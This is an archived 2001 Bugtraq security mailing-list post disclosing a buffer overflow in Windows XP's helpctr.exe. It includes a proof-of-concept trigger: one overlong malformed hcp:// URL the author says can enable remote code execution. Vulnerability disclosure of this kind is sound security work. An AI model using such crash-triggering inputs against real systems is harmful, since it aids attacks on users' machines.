[23225] in bugtraq
Buffer overflow in Windows XP "helpctr.exe"
daemon@ATHENA.MIT.EDU (mozoral@superonline.com)
Wed Nov 21 21:28:05 2001
From: <mozoral@superonline.com>
To: bugtraq@securityfocus.com
Date: Wed, 21 Nov 2001 16:32:14 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-9
Content-Transfer-Encoding: 7bit
Message-Id: <20011121143110.PVMY436.fep01@[212.252.115.5]>
Hi,
I don't know if this has been reported before. I discovered an exploitable buffer overflow vulnerability in "helpctr.exe", which can enable an attacker to execute an arbitrary code on remote users with a malformed url.
Example :
"hcp://m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m"
Note : Dots are important do not remove them.
I'm using Windows XP Pro Build 2600
Meliksah Ozoral
mozoral@superonline.com
